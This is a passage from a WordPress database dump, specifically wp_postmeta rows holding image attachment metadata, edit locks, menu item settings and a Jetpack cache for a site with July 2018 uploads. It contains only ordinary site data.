"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7592, 3284, '_hide_featured', NULL),
(7593, 3290, '_edit_lock', '1530681388:3'),
(7594, 3290, '_edit_last', '3'),
(7595, 3291, '_wp_attached_file', '2018/07/4-7-2561-12-11-07.jpg'),
(7596, 3291, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/07/4-7-2561-12-11-07.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-11-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7597, 3292, '_wp_attached_file', '2018/07/4-7-2561-12-11-25.jpg'),
(7598, 3292, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:953;s:6:\"height\";i:340;s:4:\"file\";s:29:\"2018/07/4-7-2561-12-11-25.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-11-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-11-25-300x107.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-11-25-768x274.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:274;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-11-25-400x143.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7599, 3293, '_wp_attached_file', '2018/07/4-7-2561-12-17-22.jpg'),
(7600, 3293, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:153;s:4:\"file\";s:29:\"2018/07/4-7-2561-12-17-22.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-17-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"4-7-2561-12-17-22-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-17-22-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7601, 3290, '_hide_featured', NULL),
(7602, 3296, '_edit_lock', '1605634056:14'),
(7603, 3296, '_edit_last', '3'),
(7604, 3297, '_wp_attached_file', '2018/07/4-7-2561-12-30-47.jpg'),
(7605, 3297, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:153;s:4:\"file\";s:29:\"2018/07/4-7-2561-12-30-47.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-30-47-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"4-7-2561-12-30-47-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-30-47-400x105.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7606, 3298, '_wp_attached_file', '2018/07/4-7-2561-12-47-43.jpg'),
(7607, 3298, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:242;s:4:\"file\";s:29:\"2018/07/4-7-2561-12-47-43.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-12-47-43-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7608, 3299, '_wp_attached_file', '2018/07/4-7-2561-14-13-01.jpg'),
(7609, 3299, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:954;s:6:\"height\";i:623;s:4:\"file\";s:29:\"2018/07/4-7-2561-14-13-01.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-13-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-13-01-300x196.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-13-01-768x502.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-13-01-400x261.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7610, 3296, '_hide_featured', NULL),
(7611, 3304, '_edit_lock', '1530690068:3'),
(7612, 3304, '_edit_last', '3'),
(7613, 3305, '_wp_attached_file', '2018/07/4-7-2561-14-41-48.jpg'),
(7614, 3305, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/07/4-7-2561-14-41-48.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-41-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7615, 3306, '_wp_attached_file', '2018/07/4-7-2561-14-41-59.jpg'),
(7616, 3306, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/07/4-7-2561-14-41-59.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-41-59-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"4-7-2561-14-41-59-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-41-59-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7617, 3307, '_wp_attached_file', '2018/07/4-7-2561-14-42-16.jpg'),
(7618, 3307, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:835;s:6:\"height\";i:339;s:4:\"file\";s:29:\"2018/07/4-7-2561-14-42-16.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-42-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-42-16-300x122.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-42-16-768x312.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:312;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-14-42-16-400x162.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7619, 3304, '_hide_featured', NULL),
(7620, 3310, '_edit_lock', '1624859161:14'),
(7621, 3310, '_edit_last', '14'),
(7622, 3311, '_wp_attached_file', '2018/07/4-7-2561-15-17-37.jpg'),
(7623, 3311, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/07/4-7-2561-15-17-37.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-17-37-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7624, 3312, '_wp_attached_file', '2018/07/4-7-2561-15-17-48.jpg'),
(7625, 3312, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:585;s:6:\"height\";i:157;s:4:\"file\";s:29:\"2018/07/4-7-2561-15-17-48.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-17-48-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"4-7-2561-15-17-48-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-17-48-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7626, 3313, '_wp_attached_file', '2018/07/4-7-2561-15-28-36.jpg'),
(7627, 3313, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:812;s:6:\"height\";i:636;s:4:\"file\";s:29:\"2018/07/4-7-2561-15-28-36.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-28-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-28-36-300x235.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-28-36-768x602.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:602;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"4-7-2561-15-28-36-383x300.jpg\";s:5:\"width\";i:383;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7628, 3310, '_hide_featured', NULL),
(7629, 3316, '_menu_item_type', 'custom'),
(7630, 3316, '_menu_item_menu_item_parent', '1115'),
(7631, 3316, '_menu_item_object_id', '3316'),
(7632, 3316, '_menu_item_object', 'custom'),
(7633, 3316, '_menu_item_target', ''),
(7634, 3316, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(7635, 3316, '_menu_item_xfn', ''),
(7636, 3316, '_menu_item_url', '/เทคนิคพื้นฐาน'),
(7638, 3317, '_edit_lock', '1530764138:3'),
(7639, 3317, '_edit_last', '3'),
(7640, 3318, '_wp_attached_file', '2018/07/5-7-2561-11-06-20.jpg'),
(7641, 3318, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:156;s:4:\"file\";s:29:\"2018/07/5-7-2561-11-06-20.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-06-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"5-7-2561-11-06-20-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-06-20-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7642, 3319, '_wp_attached_file', '2018/07/5-7-2561-11-08-11.jpg'),
(7643, 3319, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/07/5-7-2561-11-08-11.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-08-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7644, 3320, '_wp_attached_file', '2018/07/5-7-2561-11-12-13.jpg'),
(7645, 3320, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:509;s:6:\"height\";i:340;s:4:\"file\";s:29:\"2018/07/5-7-2561-11-12-13.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-12-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-12-13-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"5-7-2561-11-12-13-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7646, 3317, '_hide_featured', NULL),
(7647, 3324, '_wp_attached_file', '2018/07/22-5-2561-15-19-23.jpg'),
(7648, 3324, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:680;s:6:\"height\";i:335;s:4:\"file\";s:30:\"2018/07/22-5-2561-15-19-23.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-300x148.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-400x197.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7649, 3326, '_edit_lock', '1625116407:14'),
(7650, 3326, '_edit_last', '14'),
(7651, 3327, '_edit_lock', '1530844862:3'),
(7652, 3327, '_edit_last', '3'),
(7653, 3328, '_wp_attached_file', '2018/07/6-7-2561-9-40-02.jpg'),
(7654, 3328, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:405;s:6:\"height\";i:608;s:4:\"file\";s:28:\"2018/07/6-7-2561-9-40-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"6-7-2561-9-40-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"6-7-2561-9-40-02-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"6-7-2561-9-40-02-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7655, 3329, '_wp_attached_file', '2018/07/36587813_617278435315015_5762643726547550208_o.jpg'),
(7656, 3329, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/07/36587813_617278435315015_5762643726547550208_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36587813_617278435315015_5762643726547550208_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36587813_617278435315015_5762643726547550208_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36587813_617278435315015_5762643726547550208_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36587813_617278435315015_5762643726547550208_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36587813_617278435315015_5762643726547550208_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7657, 3327, '_thumbnail_id', '3329'),
(7661, 3327, '_hide_featured', NULL),
(7662, 3327, '_wpas_done_all', '1'),
(7663, 3327, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575213930;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5026;}i:1;a:1:{s:2:\"id\";i:4881;}i:2;a:1:{s:2:\"id\";i:4765;}}}}'),
(7664, 3332, '_edit_lock', '1531100593:3'),
(7665, 3332, '_edit_last', '3'),
(7666, 3333, '_wp_attached_file', '2018/07/36674210_618311515211707_7752222734406385664_o.jpg'),
(7667, 3333, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/07/36674210_618311515211707_7752222734406385664_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36674210_618311515211707_7752222734406385664_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36674210_618311515211707_7752222734406385664_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36674210_618311515211707_7752222734406385664_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36674210_618311515211707_7752222734406385664_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36674210_618311515211707_7752222734406385664_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7668, 3332, '_thumbnail_id', '3333'),
(7672, 3332, '_hide_featured', NULL),
(7673, 3332, '_wpas_done_all', '1'),
(7674, 3336, '_edit_lock', '1531103248:3'),
(7675, 3336, '_edit_last', '3'),
